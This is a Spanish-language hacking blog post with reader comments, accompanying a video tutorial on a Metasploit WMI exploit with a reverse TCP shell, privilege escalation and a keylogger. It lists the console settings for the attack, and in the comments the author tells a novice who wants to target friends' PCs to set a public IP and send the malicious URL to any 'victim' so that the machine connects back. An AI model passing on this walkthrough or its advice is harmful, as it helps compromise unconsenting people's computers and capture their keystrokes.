[Videotuto] WMI exploit+getprivs+keylogger
Un pequeño Recordatorio para que no se pierdan con Metasploit ;)
use exploit/windows/... (Exploit que vamos a utilizar)
set SRVHOST 192.129.180.132 (IP local donde va a montar el servicio)
set SRVPORT 8080 (Puerto local del servicio)
set URIPATH xxx03 (Uri del servicio ex. http://192.129.180.132/xxx03)
set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
set LHOST 192.129.180.132 (IP donde se conectará la víctima)
set RHOST 192.129.180.132 (IP o host del objetivo)
set LPORT 80 (Puerto local de escucha)
exploit (Ejecutamos el exploit)[+] Salu2
[+] Si quieren dejan sus preguntas y/o peguen sus errores a ver si los puedo ayudar ;) (Espero XD)
Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.
ok bro sigo tu blog desde hase mucho y tambien usao backtrak desde hase mas de un mes tengo 4 finall
ResponderEliminartengo actualizado ala vercion 3.6 el metaxploit el probelma es el siguiente quise haser funcionar lo del video ok todo bien pero ala hora de lanzar el exploit me tira un error
[*] Exploit running as background job.
[-] Handler failed to bind to 201.252.143.116:5555
[*] Started reverse handler on 0.0.0.0:5555
[-] Exploit exception: The address is already in use (201.252.143.116:8080).
yo le puse la ip publica tal cual muestar el video me salta este error ahora lo probe con mi ip pribaday me dise esto otro aparte le cambie el puerto y me salta este error
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.3:5555
[-] Exploit exception: The address is already in use (201.252.143.116:8080)
ok el problema es que podra ser ya e buscado info por todos lasdos y no logro resolverlo talves sea que antes ejecute un xploit creo que lo hise mal y es como que me lo toma al anteriro exploit.
weno espero que puedas hayudarme
Hola!!
ResponderEliminarPermiteme presentarme soy Melannie, administradora de un directorio de blogs, visité tu sitio y está genial,
me encantaría poner un link de tu blog en mi sitio web y por mi parte te pediría un enlace hacia mi web y asi beneficiar ambas webs con más visitas.
Si estas de acuerdo no dudes en escribirme a [email protected]
Éxitos con tu blog.
Un Saludo
Melannie.
holaaa soy algo nuevoo usandoo metaesploit y me gustariaa sabeer como utilizar los exploits k no sea en mi mismaa red oseaa quieroo utilizarloo a pc de amigoos y eso asii ...
ResponderEliminarSaludos Graciaas!
@Anónimo
ResponderEliminarQue extraño viejo, debería funcionar... En todo caso el problema dice que ya está en uso esa IP con ese Puerto, intenta cambiando el puerto y revisando si tienes otra shell corriendo en Metasploit...
[+] Salu2
[+] Postea en caso de otro error, eso si voy a estar inactivo por 5 días ;)
@Anónimo
ResponderEliminarNovice: mira, el exploit al ser de conexión inversa (para evitar el firewall de Windows) se tiene que programar para que nuestra víctima se conecte a nosotros, por eso tienes que poner tu IP pública en "set LHOST" y luego al lanzar el exploit te saldrá una URL que tienes que enviar a tu víctima para que él se conecte a ti. De ese modo le puedes enviar la URL maliciosa a cualquier persona sin necesidad de saber su IP.
[+] Salu2
Me alegro de que os haya gustado el vídeo ;)
ResponderEliminarTienes un gran blog ZioneR, lo sigo a diario.
Un saludo
Una cosa podrias publicar bien el codigo porque no lo veo bien
ResponderEliminar@Anónimo
ResponderEliminarToda la razón.. no sé como pasó, ya lo arreglé ;)